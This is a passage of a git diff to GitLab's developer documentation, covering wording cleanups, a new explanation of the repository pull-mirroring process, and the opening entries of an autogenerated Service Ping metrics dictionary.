b/doc/development/rake_tasks.md @@ -249,6 +249,13 @@ git push -u origin update-project-templates Now create a merge request and merge that to main. +To update just a single template instead of all of them, specify the template name +between square brackets. For example, for the `cluster_management` template, run: + +```shell +bundle exec rake gitlab:update_project_templates\[cluster_management\] +``` + ## Generate route lists To see the full list of API routes, you can run: diff --git a/doc/development/reactive_caching.md b/doc/development/reactive_caching.md index b6878ee48f1..3c0a1419604 100644 --- a/doc/development/reactive_caching.md +++ b/doc/development/reactive_caching.md @@ -72,27 +72,27 @@ For more information, read the internal issue ## How to use -### In models and services +### In models and integrations -The ReactiveCaching concern can be used in models as well as `project_services` -(`app/models/project_services`). +The ReactiveCaching concern can be used in models as well as `integrations` +(`app/models/integrations`). -1. Include the concern in your model or service. +1. Include the concern in your model or integration. - When including in a model: + To include the concern in a model: ```ruby include ReactiveCaching ``` - or when including in a `project_service`: + To include the concern in an integration: ```ruby include ReactiveService ``` -1. Implement the `calculate_reactive_cache` method in your model/service. -1. Call `with_reactive_cache` in your model/service where the cached value is needed. +1. Implement the `calculate_reactive_cache` method in your model or integration. +1. Call `with_reactive_cache` in your model or integration where the cached value is needed. 1. Set the [`reactive_cache_work_type` accordingly](#selfreactive_cache_work_type). ### In controllers @@ -258,7 +258,7 @@ self.reactive_cache_hard_limit = 5.megabytes - This is the type of work performed by the `calculate_reactive_cache` method. Based on this attribute, it's able to pick the right worker to process the caching job. Make sure to set it as `:external_dependency` if the work performs any external request -(e.g. Kubernetes, Sentry); otherwise set it to `:no_dependency`. +(for example, Kubernetes, Sentry); otherwise set it to `:no_dependency`. #### `self.reactive_cache_worker_finder` diff --git a/doc/development/redis.md b/doc/development/redis.md index 893fe1dcbcd..e631a6ec80c 100644 --- a/doc/development/redis.md +++ b/doc/development/redis.md @@ -20,7 +20,6 @@ On GitLab.com, we use [separate Redis instances](../administration/redis/replication_and_failover.md#running-multiple-redis-clusters). See the [Redis SRE guide](https://gitlab.com/gitlab-com/runbooks/-/blob/master/docs/redis/redis-survival-guide-for-sres.md) for more details on our setup. -We do not currently use [ActionCable on GitLab.com](https://gitlab.com/groups/gitlab-com/gl-infra/-/epics/228). Every application process is configured to use the same Redis servers, so they can be used for inter-process communication in cases where [PostgreSQL](sql.md) diff --git a/doc/development/refactoring_guide/index.md b/doc/development/refactoring_guide/index.md index a25000589c0..a6ed83258f3 100644 --- a/doc/development/refactoring_guide/index.md +++ b/doc/development/refactoring_guide/index.md @@ -14,7 +14,7 @@ Pinning tests help you ensure that you don't unintentionally change the output o ### Example steps -1. Identify all the possible inputs to the refactor subject (e.g. anything that's injected into the template or used in a conditional). +1. Identify all the possible inputs to the refactor subject (for example, anything that's injected into the template or used in a conditional). 1. For each possible input, identify the significant possible values. 1. Create a test to save a full detailed snapshot for each helpful combination values per input. This should guarantee that we have "pinned down" the current behavior. The snapshot could be literally a screenshot, a dump of HTML, or even an ordered list of debugging statements. 1. Run all the pinning tests against the code, before you start refactoring (Oracle) diff --git a/doc/development/renaming_features.md b/doc/development/renaming_features.md index f7fc1c11e37..bd25fa1377e 100644 --- a/doc/development/renaming_features.md +++ b/doc/development/renaming_features.md @@ -12,7 +12,7 @@ Sometimes the business asks to change the name of a feature. Broadly speaking, t - Pros: does not increase code complexity. - Cons: more work to execute, and higher risk of immediate bugs. - Façade, rename as little as possible; only the user-facing content like interfaces, - documentation, error messages, etc. + documentation, error messages, and so on. - Pros: less work to execute. - Cons: increases code complexity, creating higher risk of future bugs. diff --git a/doc/development/repository_mirroring.md b/doc/development/repository_mirroring.md index 61157c88618..bb4c62d70ee 100644 --- a/doc/development/repository_mirroring.md +++ b/doc/development/repository_mirroring.md @@ -11,11 +11,41 @@ info: To determine the technical writer assigned to the Stage/Group associated w <!-- vale gitlab.Spelling = NO --> In December 2018, Tiago Botelho hosted a Deep Dive (GitLab team members only: `https://gitlab.com/gitlab-org/create-stage/issues/1`) -on the GitLab [Pull Repository Mirroring functionality](../user/project/repository/repository_mirroring.md#pulling-from-a-remote-repository) +on the GitLab [Pull Repository Mirroring functionality](../user/project/repository/repository_mirroring.md#pull-from-a-remote-repository) to share his domain specific knowledge with anyone who may work in this part of the codebase in the future. You can find the <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [recording on YouTube](https://www.youtube.com/watch?v=sSZq0fpdY-Y), and the slides in [PDF](https://gitlab.com/gitlab-org/create-stage/uploads/8693404888a941fd851f8a8ecdec9675/Gitlab_Create_-_Pull_Mirroring_Deep_Dive.pdf). Everything covered in this deep dive was accurate as of GitLab 11.6, and while specific details may have changed since then, it should still serve as a good introduction. -<!-- vale gitlab.Spelling = YES -->
\ No newline at end of file +<!-- vale gitlab.Spelling = YES --> + +## Explanation of mirroring process + +GitLab version 14 performs these steps when an +[API call](../api/projects.md#start-the-pull-mirroring-process-for-a-project) +triggers a pull mirror. Scheduled mirror updates are similar, but do not start with the API call: + +1. The request originates from an API call, and triggers the `start_pull_mirroring_service` in + [`project_mirror.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/api/project_mirror.rb). +1. The pull mirroring service + ([`start_pull_mirroring_service.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/services/start_pull_mirroring_service.rb)) starts. It updates the project state, and forces the job to start immediately. +1. The project import state is updated, and then triggers an `update_all_mirrors_worker` in + [`project_import_state.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/models/ee/project_import_state.rb#L170). +1. The update all mirrors worker + ([`update_all_mirrors_worker.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/workers/update_all_mirrors_worker.rb)) + attempts to avoid stampedes by calling the `project_import_schedule` worker. +1. The project import schedule worker + ([`project_import_schedule_worker.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/workers/project_import_schedule_worker.rb#L21)) updates the state of the project, and + starts a Ruby `state_machine` to manage the import transition process. +1. While updating the project state, + [this call in `project.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/models/ee/project.rb#L426) + starts the `repository_update_mirror` worker. +1. The Sidekiq background mirror workers + ([`repository_update_mirror_worker.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/workers/repository_update_mirror_worker.rb)) track the state of the mirroring task, and + provide good error state information. Processes can hang here, because this step manages the Git steps. +1. The update mirror service + ([`update_mirror_service.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/app/services/projects/update_mirror_service.rb)) + performs the Git operations. + +The import and mirror update processes are complete after the update mirror service step. However, depending on the changes included, more tasks (such as pipelines for commits) can be triggered. diff --git a/doc/development/reusing_abstractions.md b/doc/development/reusing_abstractions.md index 1e200e1f520..ded6b074324 100644 --- a/doc/development/reusing_abstractions.md +++ b/doc/development/reusing_abstractions.md @@ -215,7 +215,7 @@ provided by Active Record are not included, except for the following methods: ### Active Record The API provided by Active Record itself, such as the `where` method, `save`, -`delete_all`, etc. +`delete_all`, and so on. ### Worker diff --git a/doc/development/scalability.md b/doc/development/scalability.md index b260618c220..824c98b4b03 100644 --- a/doc/development/scalability.md +++ b/doc/development/scalability.md @@ -23,7 +23,7 @@ users. We discuss each component below. ### PostgreSQL The PostgreSQL database holds all metadata for projects, issues, merge -requests, users, etc. The schema is managed by the Rails application +requests, users, and so on. The schema is managed by the Rails application [db/structure.sql](https://gitlab.com/gitlab-org/gitlab/-/blob/master/db/structure.sql). GitLab Web/API servers and Sidekiq nodes talk directly to the database by using a @@ -91,7 +91,7 @@ ownership. It shares a lot of challenges with traditional, data-oriented sharding, however. For instance, joining data has to happen in the application itself rather than on the query layer (although additional layers like GraphQL might mitigate that) and it requires true -parallelism to run efficiently (i.e. a scatter-gather model to collect, +parallelism to run efficiently (that is, a scatter-gather model to collect, then zip up data records), which is a challenge in itself in Ruby based systems. @@ -243,7 +243,7 @@ Ruby on Rails applications. In GitLab, Sidekiq performs the heavy lifting of many activities, including: - Updating merge requests after a push. -- Sending e-mails. +- Sending email messages. - Updating user authorizations. - Processing CI builds and pipelines. @@ -276,7 +276,7 @@ in a timely manner: this to `ProcessCommitWorker`. - Redistribute/gerrymander Sidekiq processes by queue types. Long-running jobs (for example, relating to project import) can often - squeeze out jobs that run fast (for example, delivering e-mail). [This technique + squeeze out jobs that run fast (for example, delivering email). [This technique was used in to optimize our existing Sidekiq deployment](https://gitlab.com/gitlab-com/gl-infra/infrastructure/-/issues/7219#note_218019483). - Optimize jobs. Eliminating unnecessary work, reducing network calls (including SQL and Gitaly), and optimizing processor time can yield significant diff --git a/doc/development/secure_coding_guidelines.md b/doc/development/secure_coding_guidelines.md index 74f65034383..fc60c1d7d7f 100644 --- a/doc/development/secure_coding_guidelines.md +++ b/doc/development/secure_coding_guidelines.md @@ -49,7 +49,7 @@ Each time you implement a new feature/endpoint, whether it is at UI, API or Grap - Do not forget **abuse cases**: write specs that **make sure certain things can't happen** - A lot of specs are making sure things do happen and coverage percentage doesn't take into account permissions as same piece of code is used. - Make assertions that certain actors cannot perform actions -- Naming convention to ease auditability: to be defined, e.g. a subfolder containing those specific permission tests or a `#permissions` block +- Naming convention to ease auditability: to be defined, for example, a subfolder containing those specific permission tests or a `#permissions` block Be careful to **also test [visibility levels](https://gitlab.com/gitlab-org/gitlab-foss/-/blob/master/doc/development/permissions.md#feature-specific-permissions)** and not only project access rights. @@ -59,13 +59,13 @@ Some example of well implemented access controls and tests: 1. [example2](https://dev.gitlab.org/gitlab/gitlabhq/-/merge_requests/2511/diffs#ed3aaab1510f43b032ce345909a887e5b167e196_142_155) 1. [example3](https://dev.gitlab.org/gitlab/gitlabhq/-/merge_requests/3170/diffs?diff_id=17494) -**NB:** any input from development team is welcome, e.g. about Rubocop rules. +**NB:** any input from development team is welcome, for example, about Rubocop rules. ## Regular Expressions guidelines ### Anchors / Multi line -Unlike other programming languages (e.g. Perl or Python) Regular Expressions are matching multi-line by default in Ruby. Consider the following example in Python: +Unlike other programming languages (for example, Perl or Python) Regular Expressions are matching multi-line by default in Ruby. Consider the following example in Python: ```python import re diff --git a/doc/development/serializing_data.md b/doc/development/serializing_data.md index f5924a44753..48e756d015b 100644 --- a/doc/development/serializing_data.md +++ b/doc/development/serializing_data.md @@ -35,7 +35,7 @@ turn there's no way to query the data at all. ## Waste Of Space Storing serialized data such as JSON or YAML will end up wasting a lot of space. -This is because these formats often include additional characters (e.g. double +This is because these formats often include additional characters (for example, double quotes or newlines) besides the data that you are storing. ## Difficult To Manage @@ -69,9 +69,9 @@ can easily take hours or even days to complete. ## Relational Databases Are Not Document Stores When storing data as JSON or YAML you're essentially using your database as if -it were a document store (e.g. MongoDB), except you're not using any of the +it were a document store (for example, MongoDB), except you're not using any of the powerful features provided by a typical RDBMS _nor_ are you using any of the -features provided by a typical document store (e.g. the ability to index fields +features provided by a typical document store (for example, the ability to index fields of documents with variable fields). In other words, it's a waste. ## Consistent Fields diff --git a/doc/development/service_ping/dictionary.md b/doc/development/service_ping/dictionary.md new file mode 100644 index 00000000000..153c385c4bb --- /dev/null +++ b/doc/development/service_ping/dictionary.md @@ -0,0 +1,23249 @@ +--- +stage: Growth +group: Product Intelligence +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +--- + +<!--- + This documentation is auto generated by a script. + + Please do not edit this file directly, check generate_metrics_dictionary task on lib/tasks/gitlab/usage_data.rake. +---> + +# Metrics Dictionary + +This file is autogenerated, please do not edit directly. + +To generate these files from the GitLab repository, run: + +```shell +bundle exec rake gitlab:usage_data:generate_metrics_dictionary +``` + +The Metrics Dictionary is based on the following metrics definition YAML files: + +- [`config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/metrics) +- [`ee/config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/ee/config/metrics) + +Each table includes a `milestone`, which corresponds to the GitLab version when the metric +was released. + +<!-- vale off --> +<!-- Docs linting disabled after this line. --> +<!-- See https://docs.gitlab.com/ee/development/documentation/testing.html#disable-vale-tests --> + +## Metrics Definitions + +### `active_user_count` + +The number of active users existing in the instance. This is named the instance_user_count in the Versions application. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210204124829_active_user_count.yml) + +Group: `group::product intelligence` + +Data Category: `Subscription` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `analytics_unique_visits.analytics_unique_visits_for_any_target` + +Unique visitors to any analytics feature by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174908_analytics_unique_visits_for_any_target.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.analytics_unique_visits_for_any_target_monthly` + +Unique visitors to any analytics feature by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216174910_analytics_unique_visits_for_any_target_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.g_analytics_contribution` + +Unique visitors to /groups/:group/-/contribution_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174836_g_analytics_contribution.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.g_analytics_insights` + +Unique visitors to /groups/:group/-/insights + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174838_g_analytics_insights.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.g_analytics_issues` + +Unique visitors to /groups/:group/-/issues_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174840_g_analytics_issues.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.g_analytics_merge_request` + +Unique visitors to /groups/:group/-/analytics/merge_request_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174902_g_analytics_merge_request.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free` + +### `analytics_unique_visits.g_analytics_productivity` + +Unique visitors to /groups/:group/-/analytics/productivity_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174842_g_analytics_productivity.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.g_analytics_valuestream` + +Unique visitors to /groups/:group/-/analytics/value_stream_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174844_g_analytics_valuestream.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.i_analytics_cohorts` + +Unique visitors to /-/instance_statistics/cohorts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174858_i_analytics_cohorts.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.i_analytics_dev_ops_adoption` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210423005644_i_analytics_dev_ops_adoption.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `analytics_unique_visits.i_analytics_dev_ops_score` + +Unique visitors to /-/instance_statistics/dev_ops_score + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174900_i_analytics_dev_ops_score.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.i_analytics_instance_statistics` + +Unique visitors to/admin/usage_trends + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174906_i_analytics_instance_statistics.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_code_reviews` + +Unique visitors to /:group/:project/-/analytics/code_reviews + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174848_p_analytics_code_reviews.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_insights` + +Unique visitors to /:group/:project/insights + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174852_p_analytics_insights.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_issues` + +Unique visitors to /:group/:project/-/analytics/issues_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174854_p_analytics_issues.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_merge_request` + +Unique visitors to /:group/:project/-/analytics/merge_request_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216174904_p_analytics_merge_request.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_pipelines` + +Unique visitors to /:group/:project/pipelines/charts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174846_p_analytics_pipelines.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_repo` + +Unique visitors to /:group/:project/-/graphs/master/charts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174856_p_analytics_repo.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.p_analytics_valuestream` + +Unique visitors to /:group/:project/-/value_stream_analytics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174850_p_analytics_valuestream.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `analytics_unique_visits.users_viewing_analytics_group_devops_adoption` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210428142406_users_viewing_analytics_group_devops_adoption.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `compliance_unique_visits.a_compliance_audit_events_api` + +Unique users that have used the Audit Events API. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183912_a_compliance_audit_events_api.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `compliance_unique_visits.compliance_unique_visits_for_any_target` + +Number of unique visits to any compliance page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183914_compliance_unique_visits_for_any_target.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `compliance_unique_visits.compliance_unique_visits_for_any_target_monthly` + +Number of unique visits to any compliance page over a given month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183916_compliance_unique_visits_for_any_target_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `compliance_unique_visits.g_compliance_audit_events` + +Unique users who have viewed audit events + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183906_g_compliance_audit_events.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `compliance_unique_visits.g_compliance_dashboard` + +Number of unique visitors to the compliance dashboard. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183904_g_compliance_dashboard.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `compliance_unique_visits.i_compliance_audit_events` + +Unique users that have viewed the instance-level audit events screen + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183908_i_compliance_audit_events.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `compliance_unique_visits.i_compliance_credential_inventory` + +Unique users who have viewed the credential inventory + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216183910_i_compliance_credential_inventory.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `container_registry_enabled` + +A count of projects where the container registry is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124858_container_registry_enabled.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `container_registry_server.vendor` + +Identifies if a user is using an external container registry and what type + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181051_vendor.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `container_registry_server.version` + +Identifies the version of the external registry being used + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210216181053_version.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.alert_bot_incident_issues` + +Count of issues created by the alert bot automatically + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180449_alert_bot_incident_issues.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.all_searches` + +Total Searches for All Basic Search and Advanced Search in self-managed and SaaS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180413_all_searches.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.api_fuzzing_dnd_jobs` + +Count of API Fuzzing `docker-in-docker` jobs run by job name + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180346_api_fuzzing_dnd_jobs.yml) + +Group: `group::fuzz testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.api_fuzzing_jobs` + +Count of API Fuzzing jobs run by job name + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180344_api_fuzzing_jobs.yml) + +Group: `group::fuzz testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.assignee_lists` + +Count of assignee lists created on Boards + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181100_assignee_lists.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.auto_devops_disabled` + +Projects with Auto DevOps template disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175231_auto_devops_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.auto_devops_enabled` + +Projects with Auto DevOps template enabled (excluding implicit Auto DevOps enabled and Auto DevOps template includes) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175229_auto_devops_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.boards` + +Count of Boards created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181252_boards.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_builds` + +Unique builds in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175510_ci_builds.yml) + +Group: `group::pipeline execution` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_external_pipelines` + +Total pipelines in external repositories + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175514_ci_external_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `counts.ci_internal_pipelines` + +Total pipelines in GitLab repositories + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175512_ci_internal_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_pipeline_config_auto_devops` + +Total pipelines from an Auto DevOps template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175516_ci_pipeline_config_auto_devops.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_pipeline_config_repository` + +Total Pipelines from templates in repository + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175518_ci_pipeline_config_repository.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_pipeline_schedules` + +Pipeline schedules in GitLab + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175523_ci_pipeline_schedules.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners` + +Total configured Runners in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175520_ci_runners.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_group_type_active` + +Total active instance Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502050341_ci_runners_group_type_active.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_group_type_active_online` + +Total active and online group Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502051922_ci_runners_group_type_active_online.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_instance_type_active` + +Total active group Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502045402_ci_runners_instance_type_active.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_instance_type_active_online` + +Total active and online instance Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502051651_ci_runners_instance_type_active_online.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_online` + +Total online Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502050942_ci_runners_online.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_project_type_active` + +Total active project Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502050834_ci_runners_project_type_active.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_runners_project_type_active_online` + +Total active and online project Runners + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210502052036_ci_runners_project_type_active_online.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.ci_triggers` + +Total configured Triggers in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175521_ci_triggers.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters` + +Total GitLab Managed clusters both enabled and disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175232_clusters.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_cert_managers` + +Total GitLab Managed clusters with GitLab Managed App:Cert Manager installed + +[YAML 